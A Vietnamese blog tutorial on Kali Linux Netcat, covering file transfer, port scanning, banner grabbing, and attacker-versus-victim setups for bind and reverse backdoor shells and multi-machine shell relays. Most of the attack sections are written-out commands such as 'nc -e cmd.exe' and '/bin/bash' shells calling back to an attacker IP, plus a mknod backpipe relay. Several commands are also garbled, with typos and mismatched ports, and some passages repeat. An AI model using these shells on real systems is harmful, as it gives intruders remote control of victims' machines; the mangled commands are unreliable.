Kali linux - Banner Grabbing - Hướng dẫn sử dụng Netcat
Thứ Hai, 5 tháng 3, 2018
Trong Kali linux có tích hợp sẵn Netcat, vậy Netcat là gì ? là một tiện ích mạng máy tính để đọc và viết cho các kết nối mạng sử dụng TCP hoặc UDP . Netcat được thiết kế để trở thành một back-end đáng tin cậy có thể được sử dụng trực tiếp hoặc dễ dàng bằng các chương trình và kịch bản khác. Đồng thời, đó là một công cụ gỡ rối và điều tra mạng có tính năng phong phú, vì nó có thể tạo ra bất kỳ loại kết nối nào mà người dùng có thể cần và có nhiều chức năng tích hợp.
Mở Terminal trong Kali gõ dòng lệnh sau để kiểm tra phiên bản và danh sách Help được hỗ trợ trong Netcat.
root@bad:~# nc -h or root@bad:~# netcat -h
Trong Netcat có hỗ trợ 2 Option :
Connect to somewhere : cấu trúc dòng lệnh như sau
root@bad:~# nc [-options] hostname port[s] [ports]
root@bad:~# nc -l -p port [-options] [hostname] [port]
Để bắt đầu thực hiện các ký thuật cần lưu ý 2 cái cơ bản và bắt buộc sau :
$ nc [TargetIPaddr] [port] : kết nối với IP target với port tuỳ ý
$ nc -l -p [LocalPort] : Mở một port tuỳ ý để lắng nghe.
-Push a file frome client to listener : Dùng Netcat đẩy nội dung bên trong một file từ máy nguồn đến máy đích.
Nạn nhân : Tạo một file win.txt, sau khi bên chủ đích thực hiện lệnh gởi thì nội dung bên file demo.txt sẽ chuyển sang file win.txt.
Z:\Desktop\netcat-win32-1.12>nc -l -p 555 > win.txt
Chủ đích : Tạo một file demo.txt với nội dung Connect tu Kali den win 7.
root@bad:~/Desktop# echo "Connect tu Kaliden win 7" > demo.txt root@bad:~/Desktop# cat demo.txt Connect tu Kaliden win 7 root@bad:~/Desktop# nc -w3 192.168.1.250 5555 < demo.txt root@bad:~/Desktop#
Khi hoàn tất mở file win.txt sẽ thấy nội dung bên Chủ đích chuyển sang.
Pull file fron listener back to client : Dùng Netcat chuyển một file từ nạn nhân sang chủ đích .
Nạn nhân : Tạo một file win7.txt, sau khi bên chủ đích thực hiện lệnh sẽ sẽ chuyển nội dung file win7.txt sang file outfile.txt bên máy chủ đích.
Z:\Desktop\netcat-win32-1.12>nc -l -p 5555 < win7.txt
root@bad:~/Desktop#nc -w3 192.168.1.250 5555 > outfile.txt
root@bad:~/Desktop#nc -v -n -z -w1 [TargetIPaddr] [start_port] - [end_port]
TCP Banner Grabbing : Netcat scan thông tin của nạn nhân qua đường TCP với cú pháp.
root@bad:~/Desktop#echo "" | nc -v -n -w1 [TargetIPaddr] [Start_port] - [end_port]
Backdoor Shells : Dùng Netcat tạo ra file gián điệp để tấn công nạn nhân chiếm quyền cmd trên windowns và Terminal trên Linux.
Có 2 cách :
Listening backdoor shell on Linux/Windowns : Máy chủ đích gọi IP máy nạn nhân và truyền lệnh để chiếm quyền cmd trên windowns hoặc Terminal trên Linux.
Nạn nhân : chạy trước dòng lệnh sau để mở port 5555
Listening backdoor shell on Linux/Windowns : Máy chủ đích gọi IP máy nạn nhân và truyền lệnh để chiếm quyền cmd trên windowns hoặc Terminal trên Linux.
Nạn nhân : chạy trước dòng lệnh sau để mở port 5555
Z:\Desktop\netcat-win32-1.12>nc -lvp 5555 -e cmd.exe(windows) or /bin/bash(linux)
Chủ đích : Khi nan nhân chạy dòng lệnh để mở port 5555 xong máy chủ đích sẽ chạy dòng lệnh sau
root@bad:~/Desktop# nc 192.168.1.250 5555
Sau khi máy chủ đích chạy xong dòng lệnh khi thành công thì trên Terminal của máy chủ đích sẽ là hiển thị của nạn nhân và gián tiếp thực hiện lệnh trên máy nạn nhân.
Reverse backdoor shell on Linux/Windowns : Cách này là máy nạn nhân chỉ đích danh máy chủ đích, giống mời đại ca IP xxx vào nhà con xơi nước. Mục đích của nó cũng chiếm quyền cmd trên Windowns và Terminal trên Linux.
Chủ đích : máy chủ đích sẽ chạy dòng lệnh sau mở port sẵn, giống như năm vùng đợi thời cơ
root@bad:~/Desktop# nc -lvp 5555
Nạn nhân : Nạn nhân sẽ chạy dòng lệnh sau kèm theo IP của máy chủ đích, giống đại ca IPxxx em mời a vào.
Z:\Desktop\netcat-win32-1.12>nc 192.168.1.236 -e cmd.exe(windows) or /bin/bash(linux)
Cuối cùng sau khi mời đại ca chủ đích vào thế là đại ca năm quyền quản lý cmd trên windowns và terminal nếu trên Linux.
Netcat Relays on Linux /Windowns : Netcat hỗ trợ relay được hiểu nôm na như có 3 máy tính, một máy là Chủ đích, một máy bạn của chủ đích là Bạn Chủ đích và một máy là Nạn nhân.
Mục tiêu quá trình thực hiện là Chủ đích muốn cho bạn của nó là Bạn chủ đích có quyền quản trị cmd trên nếu Nạn nhân là windowns hoặc Terminal nếu Nạn nhân là Linux.
Mục tiêu quá trình thực hiện là Chủ đích muốn cho bạn của nó là Bạn chủ đích có quyền quản trị cmd trên nếu Nạn nhân là windowns hoặc Terminal nếu Nạn nhân là Linux.
Chủ đích : IP - 192.168.1.236
Bạn chủ đích : IP - 192.168.1.146
Nạn nhân : IP - 192.168.1.250
Netcat relay Linux :
Chủ đích : IP - 192.168.1.236
Bạn chủ đích : IP - 192.168.1.146
Nạn nhân : IP - 192.168.1.250
root@bad:~/Desktop#mknod backpipe 7 /*Đầu tiên tạo một file device hệ thống tên backpipe*/ root@bad:~/Desktop#nc 192.168.1.146 4444 0<backpipe(ip,port BCĐ) | nc 192.168.1.250 222 1>backpie(ip,port nạn nhân)
root@bad:~/Desktop#nc -l -p 444 (Mở port 444 d)
Nạn nhân : IP - 192.168.1.250
root@bad:~/Desktop#nc -l -p 222 -e /bin/sh (Trên nạn nhân đã mở port 222 và backdoor được quyền chạy ngầm Terminal, Chủ đích sẽ gởi quyền này cho Bạn chủ đích chạy)
Netcat relay Windowns :
Chủ đích : IP - 192.168.1.236
Bạn chủ đích : IP - 192.168.1.146
Nạn nhân : IP - 192.168.1.250
Z:\Desktop\netcat-win32-1.12> echo nc 192.168.1.146 444(IP,port BCĐ) >relay.bat(Tạo file relay) Z:\Desktop\netcat-win32-1.12> echo nc 192.168.1.250 222(IP,port nạn nhân) -e<relay.bat
Z:\Desktop\netcat-win32-1.12>nc - -p 444(Mở port 444 chủ đích gởi quyền quản lý cmd qua port này)
Nạn nhân : IP - 192.168.1.250
Z:\Desktop\netcat-win32-1.12>nc -l -p 222 -e cmd.exe(Backdoor cmd trên windowns windows)
Cuối cùng thì bạn chủ đích sẽ toàn quyền sử dụng CMD or Terminal, đây là kịch bản kỹ thuật của
Net command flag : Khá giống scan port, thay vì scan thì quét theo dãy port, flag là gắng cờ 1 port nào đo, như scan xem nạn nhân có mở port 23 hay không ...
Nhãn: Banner Grabbing, Kali Linux